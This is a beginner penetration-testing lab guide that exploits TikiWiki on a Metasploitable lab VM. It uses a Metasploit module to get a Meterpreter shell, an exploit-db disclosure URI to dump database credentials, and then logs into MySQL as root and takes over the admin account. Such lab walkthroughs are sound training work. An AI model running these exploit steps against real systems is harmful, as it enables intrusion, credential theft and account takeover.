Exploitation
n00bpentesting.com
n00bpentesting.com
Lab Guide Three
Prerequisites Hardware Software
3 3 3
Topics Covered
4
A Note
4
Before You Begin
4
Lab 0ne – Exploitation
5
Answer: Exploit-‐db Challenge
10
What’s Next?
15
Twitter @shai_saint
2
n00bpentesting.com
Lab Guide Three
Prerequisites Thank you for downloading the n00bpentesting.com Lab Guide Three. This guide is designed to help the n00b penetration tester get their feet wet with some of the tools covered on n00bpentesting.com while honing their skills following the Penetration Testing Execution Standard.
Hardware • • •
Computer with Linux, Windows, or Mac OSX 4GB RAM Hard-‐drive with at least 50GB
Software VirtualBox Virtualization Software http://www.virtualbox.org/wiki/Downloads BackTrack 5 R1 Virtual Machine http://www.backtrack-‐linux.org/downloads Windows XP SP2 Virtual Machine Supply your own copy or use a NIST Image NIST -‐ http://nvd.nist.gov/fdcc/download_fdcc.cfm Metasploitable Virtual Machine http://updates.metaspoit.com/data/Metasploitable.zip.torrent
Twitter @shai_saint
3
n00bpentesting.com
Lab Guide Three
Topics Covered
•
Exploitation
A Note
All n00bpentesting.com guides will follow applicable sections of the Penetration Testing Execution Standard (PTES). It is highly recommended that any penetration tester or one who wants to move into this field should read and regularly reference the standard. It can be found here: http://www.pentest-‐standard.org/
Before You Begin It is important to update BackTrack, SET, and Metasploit before you begin each lesson. Updating these packages will ensure the latest tool updates and fixes are applied for better stability and exploit success. To Update BackTrack At the command prompt type: apt-‐get update && apt-‐get upgrade && apt-‐get dist-‐ upgrade, press ENTER To Update Set At the command prompt type: cd /pentest/exploits/set && svn update, press ENTER To Update Metasploit At the command prompt type: cd /pentest/exploits/framework && svn update, press ENTER
Twitter @shai_saint
4
n00bpentesting.com
Lab Guide Three
Lab 0ne – Exploitation In this lab you will learn how to leverage the verified metasploit vulnerability to exploit the target. You have researched the applications on the target system and verified that there is a vulnerability to exploit using metasploit. We will use the vulnerability we “tikiwiki_graph_formula_exec”. I will also share the answer to the exploit-‐db challenge.
1. Start the Backtrack VM 2. Start the metasploitable VM 3. In the BackTrack VM, update metasploit by typing at the command prompt: msfupdate, press ENTER Once the update is finished you will be at revision 14418 or higher.
4. Start metasploit, at the command prompt type: msfconsole, press ENTER When metasploit is started, you will see when it was last updated
We will now instruct metasploit to use the exploit we researched; “tikiwiki_graph_formula_exec”.
Twitter @shai_saint
5
n00bpentesting.com
Lab Guide Three
5. At the msfconsole type: use exploit/unix/webapp/tikiwiki_graph_formula_exec, press ENTER
We will need to tell the exploit the target IP address 6. At the msfconsole type: show options
This will show the available options that can be configured for the exploit. Some options such as RPORT and URI already have settings and are ok as set. We need to provide the RHOST.
Twitter @shai_saint
6
n00bpentesting.com
Lab Guide Three
7. At the msfconsole type: set RHOST “metasploitable_IP_Address”, press ENTER
This is the only option we need set and are now ready to exploit our target. 8. At the msfconsole type: exploit, press ENTER The exploit will run and when successful you will get returned a Meterpreter session.
You have successfully run the exploit on the target system. The Meterpreter is a very powerful command shell that has many great features. 9. To see what commands are available, at the meterpreter prompt type: help, press ENTER
Twitter @shai_saint
7
n00bpentesting.com
Lab Guide Three
Take time to look at all the available commands. Here are the available File system commands
Other commands that are important; • getuid – show what the current process user • cd – change directory • ls – list • download – download files from the target At this point our exploit process is running as www-‐data. This user will not have the privileges required to make system changes, however, we can still download the /etc/passwd file to get usernames for password brute force attacks.
Twitter @shai_saint
8
n00bpentesting.com
Lab Guide Three
Also, look at output provided by the exploit. It looks like we obtained the mysql database credentials. Ponder the possibilities.
Twitter @shai_saint
9
n00bpentesting.com
Lab Guide Three
Answer: Exploit-‐db Challenge During the vulnerability research phase there were several exploits available for tikiwiki at exploit-‐db.com. Lets take a look at “TikiWiki 1.9.5 Sirius (sort_mode) Information Disclosure Vulnerability“. 1. Open your browser and go to: www.exploit-‐db.com 2. Search for “tikiwi”
Twitter @shai_saint
10
n00bpentesting.com 3.
Lab Guide Three
Click on the name of the exploit “TikiWiki 1.9.5 Sirius (sort_mode) Information Disclosure Vulnerability“.
A brief description is provided of the exploit followed by a list of URIs that can be appended to the web application root to dump the database credentials. 4. Open your browser and in the URL address field type: http://metasploitable_IP_Address/tikiwiki 5. Copy the first URI from exploit-‐db: /tiki-‐listpages.php?offset=0&sort_mode= 6. Paste this URI after http://metasploitable_IP_Address/tikwiki Will look like this: http://192.168.99.102/tikiwiki/tiki-‐ listpages.php?offset=0&sort_mode=
7.
Press ENTER
Twitter @shai_saint
11
n00bpentesting.com
Lab Guide Three
The web page will show an error
Twitter @shai_saint
12
n00bpentesting.com 8.
Lab Guide Three
Scroll down the page and you will be presented the mysql database credentials
These DB credentials can now be used to login to the mysql database. 9. Open a command shell and type: mysql –h “metasploitable_IP_Address” –uroot – proot, press ENTER
You are now logged in the mysql database as root user. Let’s get the user information from the database. 10. At the mysql prompt type: use tikiwiki195; press ENTER (make sure you type a semi-‐colon (;) after each command) A message will indicate that the database has been changed
Lets see what tables exist in the database.
Twitter @shai_saint
13
n00bpentesting.com
Lab Guide Three
11. At the mysql prompt type: show tables; A long list of tables will print. We are interested in users_users in the list. To view the contents of the table we need to perform a database function called “select”. 12. At the mysql prompt type: select * FROM users_users; Users currently in the database will be displayed. The user admin with the password admin looks like a good account.
Let’s go back to the web page for tikiwiki and login with these credentials 13. In your browser go to: http://metasploitabe_IP_Address/tikiwiki 14. In the login form enter: admin for both the user and pass, click login You will be prompted to change the password, make it something easy like “pass123” You are now logged into the web application as the administrator!
Twitter @shai_saint
14
n00bpentesting.com
Lab Guide Three
What’s Next?
The next step is Post Exploitation. Please see “Intro To Penetration Testing – Lab Guide Four.
Twitter @shai_saint
15